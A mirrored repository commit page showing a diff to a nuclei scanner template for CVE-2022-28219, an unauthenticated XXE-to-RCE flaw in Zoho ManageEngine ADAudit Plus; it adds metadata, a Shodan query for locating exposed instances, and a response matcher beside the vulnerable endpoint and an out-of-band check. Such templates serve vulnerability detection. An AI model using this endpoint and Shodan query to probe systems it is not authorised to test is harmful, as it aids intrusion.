daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-28219.yaml

patch-1
Prince Chaddha 2022-06-30 14:37:30 +05:30 committed by GitHub
parent 72d3f332fa
commit 6468bf9ac4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
cves/2022/CVE-2022-28219.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-28219
info:
name: Unauthenticated XXE to RCE in Zoho ManageEngine ADAudit Plus
name: Zoho ManageEngine ADAudit Plus - Unauthenticated XXE to RCE
author: dwisiswant0
severity: critical
description: |
@ -21,12 +21,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-28219
cwe-id: CWE-611
tags: cve,cve2022,xxe,rce,zoho,manageengine
metadata:
verified: true
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
requests:
- method: POST
path:
- "{{BaseURL}}/api/agent/tabs/agentData"
headers:
Content-Type: application/json
body: |
@ -46,3 +50,8 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "ManageEngine"